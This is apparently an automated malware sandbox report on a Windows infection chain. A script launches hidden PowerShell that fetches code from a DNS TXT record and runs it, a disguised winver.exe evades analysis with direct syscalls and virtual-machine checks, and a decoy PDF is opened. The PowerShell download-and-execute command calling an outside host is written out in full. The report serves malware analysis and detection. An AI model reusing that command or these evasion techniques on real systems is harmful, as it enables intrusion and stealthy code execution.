Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4964	Jump to behavior
Source: C:\Windows\Tasks\winver.exe	Window / User API: threadDelayed 735
Source: C:\Windows\Tasks\winver.exe	Window / User API: threadDelayed 756

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8076	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Tasks\winver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Tasks\winver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Tasks\winver.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D80D658 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,

11_2_00007FF63D80D658

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7B2D10 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,

11_2_00007FF63D7B2D10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $vmci.inf_amd64_68ed49469341f563.xaml
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.xaml2b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.ni.dll2b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.psd12b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #vmci.inf_amd64_68ed49469341f563.dll
Source: powershell.exe, 00000001.00000002.1936848990.000001AD70F0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.ni.dll1
Source: winver.exe, 0000000B.00000002.2946021210.000001F9F0171000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $vmci.inf_amd64_68ed49469341f563.psd1
Source: powershell.exe, 00000001.00000002.1937403703.000001AD70F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2943237170.00000167A7A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2941116796.00000167A262B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &vmci.inf_amd64_68ed49469341f563.ni.dll
Source: powershell.exe, 00000001.00000002.1936848990.000001AD70F0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.psd1sm1
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.psm12b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vmci.inf_amd64_68ed49469341f563.cdxml
Source: powershell.exe, 00000001.00000002.1936848990.000001AD70EDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ss.svmci.syswfplwfs.sys
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.dll2b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $vmci.inf_amd64_68ed49469341f563.psm1
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\*
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf_amd64_68ed49469341f563.cdxml2b
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "vmci.inf_amd64_68ed49469341f563.ni
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D793B18 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00007FF63D793B18

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7B61C0 GetLastError,IsDebuggerPresent,OutputDebugStringW,

11_2_00007FF63D7B61C0

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D8040CC LoadLibraryA,GetProcAddress,

11_2_00007FF63D8040CC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Tasks\winver.exe	Process token adjusted: Debug

Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7D95E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		11_2_00007FF63D7D95E4
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7CB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		11_2_00007FF63D7CB558

Source: C:\Windows\Tasks\winver.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7352.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDF9C3EC20
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9B90CB8
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D08415
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D085CF
Source: C:\Windows\Tasks\winver.exe	NtOpenFile: Direct from: 0x7FFDF91722FA
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADB5FD7
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE4DB20
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D01062
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDFB22CAC6
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D09FBF
Source: C:\Windows\Tasks\winver.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFDFADAD195
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D011A5
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D08E30
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF6FC2DED
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE8E6AD
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADDFCCE
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFE221C26A1
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C43EA1
Source: C:\Windows\Tasks\winver.exe	NtReadFile: Direct from: 0x7FFDFADE6FE3
Source: C:\Windows\Tasks\winver.exe	NtOpenFile: Direct from: 0x7FFD9B902619
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D00F39
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE416AF
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C44D36
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE48BDC
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFDFAD567CB
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDF7A0F1BC
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE45D4C
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x10350
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x103E2
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFADA395E
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE336C2
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D09120
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D0A5CC
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8CFF949
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D0AAB7
Source: C:\Windows\Tasks\winver.exe	NtReadFile: Direct from: 0x7FFDFADDF056
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF8D0831F
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFADBDA3C
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFB47F346
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8D08A51
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x1F9F2BB0D01
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF8D0A75E
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8CFF658
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE0869F
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D09C4F
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAD1FF57
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C4348F
Source: C:\Windows\Tasks\winver.exe	NtReadFile: Direct from: 0x7FFDFADB5F36
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x1F9F2BB0E12
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFADE6B30
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE40CCE
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDF7A0A39B
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE07B34
Source: C:\Windows\Tasks\winver.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFDF9C4734C
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFD9BB070BB
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF8D07E28
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDF8CFF7B2
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFB3AC113
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C43C7D
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFADBA773
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE5936E
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF8D09D0F
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFE11722E64
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFDFAD9BC4A
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE415D5
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADBA418
Source: C:\Windows\Tasks\winver.exe	NtSetInformationFile: Direct from: 0x7FFDFAD272C8
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFB2D10C6
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE08DC6
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDF9C4517F
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFB2D1035
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE0797B
Source: C:\Windows\Tasks\winver.exe	NtOpenFile: Direct from: 0x7FFDFADA32D3
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFADB5F5A
Source: C:\Windows\Tasks\winver.exe	NtQueryAttributesFile: Direct from: 0x7FFDFADB9F1C
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C44413
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE4D20F
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF6FC1DC5
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADE83DC
Source: C:\Windows\Tasks\winver.exe	NtReadFile: Direct from: 0x7FFDF9C3C9C8
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x10399
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDF917430B
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDFAEAC041
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDFB484960
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE27EE9
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D02E1A
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE41F72
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDF9C4713F
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D0A443
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFADBA7F5
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x101F8
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADE08F0
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE4903F
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFADE097B
Source: C:\Windows\Tasks\winver.exe	NtOpenSection: Direct from: 0x7FFDF8D07FEF
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFB0885ED
Source: C:\Windows\Tasks\winver.exe	NtCreateFile: Direct from: 0x7FFDFADAD1F6
Source: C:\Windows\Tasks\winver.exe	NtDeviceIoControlFile: Direct from: 0x7FFDFAE6F207
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFADBDAA0
Source: C:\Windows\Tasks\winver.exe	NtMapViewOfSection: Direct from: 0x7FFDFAE4F696
Source: C:\Windows\Tasks\winver.exe	NtClose: Direct from: 0x7FFDFAE08E26

Performs DNS TXT record lookups

Source: Traffic

DNS traffic detected: queries for: ebtxghggfv.cdn-streaming.com

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D793B18 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00007FF63D793B18

Source: C:\Windows\Tasks\winver.exe

11_2_00007FF63D7B4BB4

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c start "" "C:\Windows\Tasks\62rgx9T9MW.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Tasks\winver.exe "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Windows\Tasks\62rgx9T9MW.pdf"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noninteractive -windowstyle hidden -executionpolicy remotesigned -command &{$env:psmodulepath = [io.directory]::getcurrentdirectory(); import-module appvclient; sync-appvpublishingserver n;(resolve-dnsname -name ebtxghggfv.cdn-streaming.com -type txt).strings \| iex}
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noninteractive -windowstyle hidden -executionpolicy remotesigned -command &{$env:psmodulepath = [io.directory]::getcurrentdirectory(); import-module appvclient; sync-appvpublishingserver n;(resolve-dnsname -name ebtxghggfv.cdn-streaming.com -type txt).strings \| iex}			Jump to behavior

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7FE318 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_00007FF63D7FE318

Source: winver.exe, 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmp, winver.exe.1.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: winver.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\Speech\SpeechUX\SpeechUX.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\migwiz\replacementmanifests\SppMig\SppMig.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.ClientProgrammability.Eventing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
